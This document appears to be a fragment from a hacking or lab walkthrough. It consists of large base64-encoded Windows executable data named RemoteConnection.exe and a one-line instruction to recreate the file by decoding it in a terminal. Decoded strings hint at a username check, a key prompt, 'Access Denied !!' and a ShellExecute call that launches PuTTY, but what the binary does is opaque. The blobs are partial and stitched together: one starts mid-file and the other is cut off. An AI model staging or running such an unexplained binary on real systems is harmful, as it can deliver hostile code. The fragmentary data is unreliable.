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CREBaAA0GP3VuY2F1Z2h0X2V4Y2VwdGlvbkBzdGRAQFlBX05YWgDIBT9zcHV0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRV9KUEJEX0pAWgAAUwI/X09zZnhAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWFhaAADFBT9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAkQM/Zmx1c2hAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQUFWMTJAWFoAnAU/c2V0c3RhdGVAPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYSF9OQFoAAE1TVkNQMTAwLmRsbAAADQE/d2hhdEBleGNlcHRpb25Ac3RkQEBVQkVQQkRYWgBdAD8/MWV4Y2VwdGlvbkBzdGRAQFVBRUBYWgAAIgA/PzBleGNlcHRpb25Ac3RkQEBRQUVAQUJRQkRAWgAkAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlYwMUBAWgAA0QVtZW1tb3ZlAM0FbWVtY2hyAACiBWlzYWxudW0AZQA/PzNAWUFYUEFYQFoAAGMAPz8yQFlBUEFYSUBaAABNU1ZDUjEwMC5kbGwAAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0AMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAD7AV9jcnRfZGVidWdnZXJfaG9vawAAIQJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgACAT90ZXJtaW5hdGVAQFlBWFhaAO4AP190eXBlX2luZm9fZHRvcl9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

Create the file with: "echo [output] | base64 -d > RemoteConnection.exe"

Local Terminal

echo "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